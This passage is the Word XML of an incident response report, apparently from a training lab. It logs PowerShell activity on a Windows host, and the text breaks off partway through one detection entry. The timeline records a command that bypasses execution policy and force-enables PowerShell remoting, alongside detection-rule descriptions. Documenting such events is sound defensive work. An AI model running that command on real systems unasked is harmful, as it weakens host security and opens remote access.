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737278" w14:textId="67A4EA10" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incident Response Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB44A59" w14:textId="5AB57D17" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962090F" w14:textId="21A87A7E" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9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016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E5E046" w14:textId="7C79D136" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Priority: P1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160785B2" w14:textId="4881991F" w:rsidR="00B03813" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="00B03813">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset(s) Affected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0769" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Kin</w:t>
      </w:r>
      <w:r w:rsidR="00B03813" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00BA0769" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>slanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B03813" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> (192.168.224.161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A233453" w14:textId="4DF597C8" w:rsidR="00C502B9" w:rsidRPr="00016EF6" w:rsidRDefault="00C502B9" w:rsidP="00C502B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>OS: Microsoft Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6EAABE" w14:textId="24BF9FD1" w:rsidR="00567A97" w:rsidRPr="00016EF6" w:rsidRDefault="00567A97" w:rsidP="00C502B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Process: PowerShell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79218CE5" w14:textId="4DC3AC6C" w:rsidR="00567A97" w:rsidRPr="00016EF6" w:rsidRDefault="005B5B04" w:rsidP="00C502B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Directory: c:\Users\vagrant\</w:t>
      </w:r>
      <w:r w:rsidR="00D61188" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>AppData\Local</w:t>
      </w:r>
      <w:r w:rsidR="00A778B2" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>\Temp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C6D0A" w14:textId="7BE1421C" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Owner: </w:t>
      </w:r>
      <w:r w:rsidR="00A778B2" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Sebastian Salas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4A1BE" w14:textId="1CF3FD1A" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Information: </w:t>
      </w:r>
      <w:r w:rsidR="00A778B2" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>sebasala@ensign.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE6436" w14:textId="6585A4D9" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Start Time: </w:t>
      </w:r>
      <w:r w:rsidR="00D564E8" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>2024-12-03 13:06:54 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51283B57" w14:textId="446991C4" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Close Time: </w:t>
      </w:r>
      <w:r w:rsidR="00C60009" w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>work in progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C078E63" w14:textId="4EFD9D57" w:rsidR="009F73C4" w:rsidRPr="00016EF6" w:rsidRDefault="009F73C4"/>
    <w:p w14:paraId="3B4CB674" w14:textId="69358DF6" w:rsidR="64E10EA2" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incident Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7483A9C7" w14:textId="376D7CBB" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>2024-12-03 13:06:16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A15341F" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>File created in temporary folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D7AC8" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC0553" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Target Filename: C:\Users\vagrant\AppData\Local\Temp\3\__PSScriptPolicyTest_thh2ozkd.hse.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5239C" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="00016EF6" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>User: SEVENKINGDOMS\vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA4A81" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F3E513" w14:textId="4157DFC8" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>2024-12-03 13:06:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7D5BB" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>PowerShell execution detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF39E1" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t>: powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t xml:space="preserve"> Bypass -C "Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t>PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D02A1">
        <w:t xml:space="preserve"> -Force"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C4981" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C8866" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>SHA1: 6CBCE4A295C163791B60FC23D285E6D84F28EE4C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A495CD0" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="00016EF6" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>MD5: 7353F60B1739074EB17C5F4DDDEFE239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26693290" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7A7466" w14:textId="1CEE308D" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>2024-12-03 13:06:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D048EB" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>File created by PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A2D5F" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Target Filename: C:\Users\vagrant\AppData\Local\Temp\3\__PSScriptPolicyTest_mwnd3bsv.ven.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB72B9" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D02A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ProcessGuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D02A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: {77c893b9-026e-674f-db17-000000000700}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146CFB8D" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="00016EF6" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:lastRenderedPageBreak/>
        <w:t>User: SEVENKINGDOMS\vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7413AEC6" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FB099E" w14:textId="1395FF25" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>2024-12-03 13:07:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACD17C" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Detection rule fired: Execution of PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED48C8" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0DE61D" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Rule ID: 255531</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241CEFD" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="00016EF6" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Description: Execution of PowerShell detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251930D5" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21AE7B55" w14:textId="51EB4E03" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>2024-12-03 13:07:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE20EE" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Detection rule fired: File dropped in commonly used malware directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42021504" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
        <w:t>Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED0A06" w14:textId="77777777" w:rsidR="007D02A1" w:rsidRPr="007D02A1" w:rsidRDefault="007D02A1" w:rsidP="007D02A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D02A1">
